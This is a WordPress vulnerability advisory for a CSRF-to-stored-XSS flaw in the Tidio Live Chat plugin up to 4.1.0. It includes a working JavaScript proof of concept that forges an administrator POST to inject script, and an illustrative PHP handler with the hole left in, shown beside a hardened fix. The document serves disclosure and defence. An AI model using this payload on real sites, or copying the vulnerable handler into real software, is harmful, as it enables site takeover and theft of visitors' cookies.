Tidio Live Chat <= 4.1.0 CSRF to Stored XSS
Description
The AJAX handler behind the admin-ajax.php action tidio_chat_save_keys in the Tidio Live Chat WordPress plugin <= 4.1.0 stores the submitted public_key and private_key values without verifying a CSRF nonce. An attacker who lures a logged-in administrator to a page they control can therefore have the admin's browser submit a forged, cookie-authenticated POST that overwrites the stored public key with attacker-chosen content. The payload in the PoC closes a script tag, indicating that the stored key is echoed into a script block on the public site, so the injected script is served to and executed in the browser of every visitor (stored XSS).

Fixed in 4.2.0.

Proof of Concept
<script>
    // CSRF page hosted on an attacker-controlled origin. When a logged-in
    // WordPress administrator loads it, the browser sends the POST below to
    // the victim site with the admin's session cookies attached.
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://wordpress.local/wp-admin/admin-ajax.php?action=tidio_chat_save_keys", true);
    xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xhr.setRequestHeader("Accept-Language", "de,en-US;q=0.7,en;q=0.3");
    // application/x-www-form-urlencoded is a CORS-safelisted content type, so
    // no preflight is sent; the response is unreadable cross-origin, but the
    // side effect (the option being saved) is all the attack needs.
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.withCredentials = true;
    // The public_key value breaks out of the script context the plugin echoes
    // it into. "\x3c" / "\x3e" are used instead of literal "<" / ">" so that
    // "</script>" does not terminate this hosting script element.
    var body = "private_key=paul_dannewitz_poc&public_key=tests\x3c/script\x3e\x3cscript\x3ealert(document.cookie)\x3c/script\x3e";
    // Send the body as raw bytes (Burp-style) so it goes out exactly as written.
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
</script>
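The following is an added illustration and is not code from the Tidio plugin or from the 4.2.0 fix. It sketches the shape of an admin-ajax handler for the tidio_chat_save_keys action that would be exploitable exactly as in the PoC above (no nonce, no capability check, value stored and echoed raw), next to a hardened version. The poc_-prefixed function names, the option names, the nonce action name and the assumed key character set are placeholders chosen for the example.

```php
<?php
/*
 * Illustrative WordPress admin-ajax handlers for action=tidio_chat_save_keys.
 * NOT the plugin's code. Option names ('poc_tidio_public_key', ...), the nonce
 * action 'poc_tidio_save_keys' and the key format below are assumptions.
 */

// --- Vulnerable shape ------------------------------------------------------
// Reachable by any request that carries the administrator's cookies, which is
// exactly what a forged cross-site POST does. Nothing ties the request to a
// form the admin actually submitted, and the value is stored untouched.
function poc_tidio_chat_save_keys_vulnerable() {
    update_option( 'poc_tidio_public_key',  $_POST['public_key'] );
    update_option( 'poc_tidio_private_key', $_POST['private_key'] );
    wp_die();
}

// Echoing the stored key straight into a script block is what turns the CSRF
// into stored XSS: "tests</script><script>alert(1)</script>" closes the tag.
function poc_tidio_print_loader_vulnerable() {
    $key = get_option( 'poc_tidio_public_key', '' );
    echo "<script>var tidioPublicKey = '" . $key . "';</script>";
}

// --- Hardened shape --------------------------------------------------------
function poc_tidio_chat_save_keys_hardened() {
    // 1. CSRF: require a nonce bound to this action and to the current user.
    //    check_ajax_referer() terminates the request when the 'nonce' field is
    //    missing or invalid, so a forged request never reaches update_option().
    check_ajax_referer( 'poc_tidio_save_keys', 'nonce' );

    // 2. Authorisation: only users who may manage plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 3. Input validation: an API key never legitimately contains markup, so
    //    reject anything outside a strict allow-list rather than trying to
    //    strip a payload. (Character set and length are assumptions.)
    $key_re      = '/\A[A-Za-z0-9_-]{1,64}\z/';
    $public_key  = isset( $_POST['public_key'] )  ? sanitize_text_field( wp_unslash( $_POST['public_key'] ) )  : '';
    $private_key = isset( $_POST['private_key'] ) ? sanitize_text_field( wp_unslash( $_POST['private_key'] ) ) : '';
    if ( ! preg_match( $key_re, $public_key ) || ! preg_match( $key_re, $private_key ) ) {
        wp_send_json_error( 'malformed key', 400 );
    }

    update_option( 'poc_tidio_public_key',  $public_key );
    update_option( 'poc_tidio_private_key', $private_key );
    wp_send_json_success();
}
add_action( 'wp_ajax_tidio_chat_save_keys', 'poc_tidio_chat_save_keys_hardened' );

// 4. Output encoding: even with validation on write, encode for the context
//    on read. esc_js() turns < > ' " into entities, so a stored value can
//    never close the script block it is printed into.
function poc_tidio_print_loader_hardened() {
    $key = get_option( 'poc_tidio_public_key', '' );
    printf( "<script>var tidioPublicKey = '%s';</script>", esc_js( $key ) );
}
add_action( 'wp_footer', 'poc_tidio_print_loader_hardened' );

// The settings page must hand the nonce to the JS that calls admin-ajax, e.g.
// after wp_enqueue_script( 'poc-tidio-admin', ... ):
//   wp_localize_script( 'poc-tidio-admin', 'pocTidio',
//       array( 'nonce' => wp_create_nonce( 'poc_tidio_save_keys' ) ) );
// and the client sends it as the 'nonce' POST field alongside the keys.
```

The nonce defeats the PoC because the attacker's page cannot read a per-user, per-action token from the victim's admin pages; the capability check stops lower-privileged authenticated users from hitting the endpoint directly; the allow-list on input and esc_js() on output each independently prevent the stored value from becoming executable markup, so a regression in one does not reopen the XSS.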

Affects Plugin

Fixed in version 4.2.0

References

URL https://dannewitz.ninja/posts/tidio-livechat-wordpress-plugin-csrf-to-stored-xss
URL https://plugins.trac.wordpress.org/changeset/2186087/

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Paul Dannewitz
Submitter Paul Dannewitz
Submitter Website https://dannewitz.ninja
Submitter Twitter padannewitz
Views 3941
Verified No
WPVDB ID 9938

Timeline

Publicly Published 2019-11-05
Added 2019-11-05
Last Updated 2019-11-28
